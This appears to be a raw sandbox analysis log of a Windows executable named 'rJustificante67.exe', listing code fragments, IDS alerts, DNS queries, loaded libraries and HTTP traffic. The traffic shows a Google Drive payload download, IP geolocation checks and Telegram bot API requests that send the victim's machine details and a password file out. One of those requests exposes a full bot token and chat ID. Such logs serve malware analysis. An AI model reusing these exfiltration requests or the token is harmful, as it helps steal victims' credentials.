Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B25A9h	3_2_356B2300
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356BF5CEh	3_2_356BF300
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356BD5DEh	3_2_356BD310
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356BECAEh	3_2_356BE9E0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B18A1h	3_2_356B15F8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356BCCBEh	3_2_356BC9F0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then mov esp, ebp	3_2_356BB1C8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B5E81h	3_2_356B5BD8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356BDA6Eh	3_2_356BD7A0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B1449h	3_2_356B11A0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356BBA7Eh	3_2_356BB7B0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B2E59h	3_2_356B2BB0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B5A29h	3_2_356B5780
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356BFA5Eh	3_2_356BF790
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B3709h	3_2_356B3460
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B4D21h	3_2_356B4A78
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B7119h	3_2_356B6E70
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356BF13Eh	3_2_356BEE70
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B02E9h	3_2_356B0040
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356BBF0Eh	3_2_356BBC40
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B1CF9h	3_2_356B1A50
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B48C9h	3_2_356B4620
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B62D9h	3_2_356B6030
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356BDEFEh	3_2_356BDC30
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B32B1h	3_2_356B3008
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B6CC1h	3_2_356B6A18
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B0B99h	3_2_356B08F0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B7571h	3_2_356B72C8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356BE38Eh	3_2_356BE0C0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B5179h	3_2_356B4ED0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356BC39Eh	3_2_356BC0D0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B2151h	3_2_356B1EA8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then mov esp, ebp	3_2_356BB089
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B6733h	3_2_356B6488
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356BD14Eh	3_2_356BCE80
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 356B0741h	3_2_356B0498
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E86347h	3_2_35E85FD8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E86970h	3_2_35E86678
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E842B6h	3_2_35E83FE8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8F8E0h	3_2_35E8F5E8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8CDD8h	3_2_35E8CAE0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E822C6h	3_2_35E81FF8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8B5F0h	3_2_35E8B2F8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E810BEh	3_2_35E80DF0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E88AE8h	3_2_35E887F0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E83996h	3_2_35E836C8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8E5C0h	3_2_35E8E2C8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8BAB8h	3_2_35E8B7C0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8A2D0h	3_2_35E89FD8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8079Eh	3_2_35E804D0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E877C8h	3_2_35E874D0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E83076h	3_2_35E82DA8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8D2A0h	3_2_35E8CFA8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E81E47h	3_2_35E81BA0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8A798h	3_2_35E8A4A0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E85986h	3_2_35E856B8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E88FB0h	3_2_35E88CB8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8FDA8h	3_2_35E8FAB0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E82756h	3_2_35E82488
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8BF80h	3_2_35E8BC88
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8154Eh	3_2_35E81280
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E89478h	3_2_35E89180
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E85066h	3_2_35E84D98
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E87C90h	3_2_35E87998
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8EA88h	3_2_35E8E790
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8AC60h	3_2_35E8A968
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E80C2Eh	3_2_35E80960
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E88158h	3_2_35E87E60
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E84746h	3_2_35E84478
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8D768h	3_2_35E8D470
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E85E16h	3_2_35E85B48
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E89940h	3_2_35E89648
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8030Eh	3_2_35E80040
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E86E38h	3_2_35E86B40
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E83E26h	3_2_35E83B58
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8EF50h	3_2_35E8EC58
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8C448h	3_2_35E8C150
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E854F6h	3_2_35E85228
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E88620h	3_2_35E88328
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8F418h	3_2_35E8F120
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E83506h	3_2_35E83238
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8DC30h	3_2_35E8D938
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8B128h	3_2_35E8AE30
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E84BD7h	3_2_35E84908
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E87300h	3_2_35E87008
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8E0F8h	3_2_35E8DE00
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E82BE6h	3_2_35E82918
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E8C910h	3_2_35E8C618
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E819DEh	3_2_35E81710
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35E89E08h	3_2_35E89B10
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35EB1FE8h	3_2_35EB1CF0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35EB0CC8h	3_2_35EB09D0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35EB1658h	3_2_35EB1360
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35EB0801h	3_2_35EB0508
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35EB1190h	3_2_35EB0E98
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35EB0338h	3_2_35EB0040
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then jmp 35EB1B20h	3_2_35EB1828
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then push 00000000h	3_2_3601537D
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_36010F8E
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_36010C33
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_36010C78
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	3_2_36010BFD

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49922 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49970 -> 149.154.167.220:443

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20and%20Time:%2017/02/2025%20/%2017:09:29%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20936905%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0/sendDocument?chat_id=7618581100&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd4f75dbc47cddHost: api.telegram.orgContent-Length: 582

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 104.21.64.1 104.21.64.1
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1nDB7ry8SARfoQUp67ibCPOyNMq9q_OUV HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1nDB7ry8SARfoQUp67ibCPOyNMq9q_OUV&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49858 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49899 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49873 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49917 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49893 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49880 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49886 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49826 -> 172.217.18.14:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49911 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49905 -> 104.21.64.1:443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: rJustificante67.exe, 00000003.00000002.3926382702.0000000032C07000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs rJustificante67.exe
Source: rJustificante67.exe, 00000003.00000002.3907242977.00000000028A3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs rJustificante67.exe

Source: unknown	Process created: C:\Users\user\Desktop\rJustificante67.exe "C:\Users\user\Desktop\rJustificante67.exe"
Source: C:\Users\user\Desktop\rJustificante67.exe	Process created: C:\Users\user\Desktop\rJustificante67.exe "C:\Users\user\Desktop\rJustificante67.exe"
Source: C:\Users\user\Desktop\rJustificante67.exe	Process created: C:\Users\user\Desktop\rJustificante67.exe "C:\Users\user\Desktop\rJustificante67.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Section loaded: secur32.dll	Jump to behavior

Source: stempelpudernes.lnk.0.dr	LNK file: ..\Pictures\muringerne\giggliest.pha
Source: dinosaurusserne.lnk.0.dr	LNK file: ..\..\..\..\Users\Public\Pictures\eksistensberettigelsen.pre

Source: Yara match	File source: 00000000.00000002.2422615423.000000000331C000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.3906023015.000000000185C000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 0_2_10002D50 push eax; ret	0_2_10002D7E
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_3_026AEE60 push eax; iretd	3_3_026AEE65
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_3_026ACF4A push eax; iretd	3_3_026ACF4D
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_3_026A38DE push 00000002h; retf 0002h	3_3_026A38E0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_3_026AEE8C push eax; iretd	3_3_026AEEA9
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_3_3584DD8D push es; ret	3_3_3584DD90
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_2_016E5162 push es; iretd	3_2_016E5170
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_2_016E5174 push ss; retf	3_2_016E51D9
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_2_016E6944 pushad ; iretd	3_2_016E6945
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_2_016E4938 push 96898B87h; ret	3_2_016E493F
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_2_016E2C7F push es; ret	3_2_016E2C87
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_2_016E58ED push es; retf	3_2_016E58F3
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_2_016E68AE push ss; retf	3_2_016E68CD
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_2_016E2C8B push es; ret	3_2_016E2C87
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_2_016E472A push dword ptr [ecx+7Eh]; ret	3_2_016E4738
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 3_2_02669C30 push esp; retf 0268h	3_2_02669D55

Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\rJustificante67.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
